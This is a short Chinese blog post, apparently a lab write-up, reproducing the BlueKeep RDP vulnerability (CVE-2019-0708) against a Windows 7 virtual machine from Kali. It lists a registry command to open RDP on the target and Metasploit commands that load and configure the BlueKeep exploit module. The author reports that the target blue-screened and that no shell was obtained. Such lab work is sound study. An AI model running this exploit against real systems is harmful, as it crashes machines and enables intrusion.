天天看點

cve-2019-0708複現

準備工作

靶機:win 7 ip:192.168.128.128 開放3389端口

攻擊機:kali2 ip:192.168.128.129

實際操作

對靶機進行開放3389

在cmd内輸入

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           

使用netstat 檢視端口開放情況

cve-2019-0708複現

在kali裡開啟msf

輸入msfconsole

如果沒有找到建議更新一下軟體

apt-get install metasploit-framework

查找exp 輸入

search 0708

cve-2019-0708複現

使用 exp 輸入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

使用

show options

檢視主要參數

cve-2019-0708複現

使用

show targets

檢視攻擊目标

cve-2019-0708複現

設定參數

set rhost 192.168.128.128 
           
set  target 3 
           
cve-2019-0708複現

運作結果

cve-2019-0708複現

靶機直接藍屏

最後

不知怎的就是不能擷取道shell,查閱資料設定

set forceexploit true

還是不能得到shell

繼續閱讀